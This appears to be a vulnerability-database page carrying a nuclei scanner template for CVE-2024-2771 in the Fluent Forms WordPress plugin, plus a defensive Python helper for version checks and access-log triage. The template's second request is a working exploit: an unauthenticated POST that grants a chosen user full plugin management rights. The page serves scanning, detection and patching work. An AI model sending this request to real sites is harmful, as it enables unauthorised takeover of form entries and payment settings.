Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation

Reported by ProjectDiscovery on 04 Jul 2026 03:00:48
Type: nuclei
Source: github.com

Unauthenticated privilege escalation in Fluent Forms before 5.1.17 via the managers REST API, which lets an attacker grant plugin management rights to a user account.

id: CVE-2024-2771

info:
  name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant Fluent Forms management permissions to users, which give them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
  impact: |
    Unauthenticated attackers can grant Fluent Form management permissions to any user account, providing access to all plugin settings and sensitive data.
  remediation: |
    Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2771-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2771
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2771
    cwe-id: CWE-862
    epss-score: 0.02333
    epss-percentile: 0.81476
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/fluentform/"
    vendor: fluentforms
    product: contact_form
    framework: wordpress
  tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 5.1.17')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  # The exploit requires an existing user email address, supplied as the {{email}} variable.
  - raw:
      - |
        POST /wp-json/fluentform/v1/managers HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate, br

        {
          "manager": {
            "email": "{{email}}",
            "permissions": [
              "fluentform_dashboard_access",
              "fluentform_forms_manager",
              "fluentform_entries_viewer",
              "fluentform_manage_entries",
              "fluentform_view_payments",
              "fluentform_manage_payments",
              "fluentform_settings_manager",
              "fluentform_full_access"
            ]
          }
        }

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, 'Manager has been saved.','{{email}}')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 490a0046304402202f8e7cab919e9861784e305655831af3afa758e76d6aee0621d33e2cce09f7e3022033ad390c59f3714ffa2e35a6c3bdf23b4541c18ffb51882b1a32a5e0cf4c521d:922c64590222798bb761d5b6d8e72950
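Added example, not part of the nuclei template or the Vulners page: a small Python helper that reproduces the template's version gate offline (the readme `Stable tag` parsed and compared numerically against 5.1.17, which avoids the string-compare trap where "5.1.9" sorts above "5.1.17") and triages combined-format access-log lines for state-changing calls to the managers endpoint, which is where a defender would look for abuse of CVE-2024-2771. The readme text, log lines and IP addresses are constructed samples.

```python
import re
from typing import Optional

FIXED_VERSION = (5, 1, 17)  # first release with the capability check
MANAGERS_ENDPOINT = "/wp-json/fluentform/v1/managers"

# Constructed sample of a plugin readme.txt header as served by WordPress.
SAMPLE_README = """=== Fluent Forms ===
Contributors: techjewel
Tested up to: 6.4
Stable tag: 5.1.9
"""

def parse_version(text: str) -> Optional[tuple]:
    """Extract 'Stable tag: X.Y.Z' as an integer tuple (same regex as the template's extractor)."""
    m = re.search(r"Stable tag: ([0-9.]+)", text)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).strip(".").split("."))

def is_vulnerable_version(text: str) -> bool:
    """True when the advertised version is below 5.1.17; compared as tuples, not strings."""
    v = parse_version(text)
    return v is not None and v < FIXED_VERSION

# Constructed access-log lines (combined log format) for triage.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jul/2026:03:00:48 +0000] "GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1" 200 812 "-" "curl/8.0"
10.0.0.5 - - [04/Jul/2026:03:00:49 +0000] "POST /wp-json/fluentform/v1/managers HTTP/1.1" 200 143 "-" "curl/8.0"
10.0.0.9 - - [04/Jul/2026:03:05:10 +0000] "GET /wp-admin/admin.php?page=fluent_forms HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
10.0.0.7 - - [04/Jul/2026:03:07:00 +0000] "DELETE /wp-json/fluentform/v1/managers/3 HTTP/1.1" 200 44 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_manager_writes(log_text: str) -> list:
    """Return (client_ip, method, path, status) for state-changing calls to the managers
    endpoint; on a patched site these should only come from authenticated administrators."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, method, path, status = m.groups()
        if path.startswith(MANAGERS_ENDPOINT) and method in ("POST", "PUT", "DELETE"):
            hits.append((ip, method, path, int(status)))
    return hits
```

A readme fetch preceded by a 200 on a POST to the managers endpoint from the same client, as in the sample, is the pattern the template itself produces and is worth correlating with the WordPress user table for newly added Fluent Forms managers.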

Scores as of 04 Feb 2026 07:00: Vulners AI Score 6 (medium risk); CVSS 3.1 9.8; EPSS 0.02333.